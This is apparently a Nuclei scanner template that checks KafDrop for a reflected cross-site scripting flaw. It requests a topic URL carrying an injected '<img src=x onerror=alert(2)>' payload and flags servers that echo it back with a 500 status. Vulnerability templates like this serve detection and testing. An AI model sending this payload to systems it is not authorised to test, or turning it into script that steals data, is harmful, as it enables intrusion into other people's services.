id: kafdrop-xss
info:
  name: KafDrop XSS
  author: dhiyaneshDk
  severity: medium
  tags: kafdrop,xss
  description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or Javascript into the response returned by the server.
  reference: https://github.com/HomeAdvisor/Kafdrop/issues/12
requests:
  - method: GET
    path:
      - "{{BaseURL}}/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Kafdrop'
          - '<img src=x onerror=alert(2)>'
        part: body
        condition: and
      - type: status
        status:
          - 500
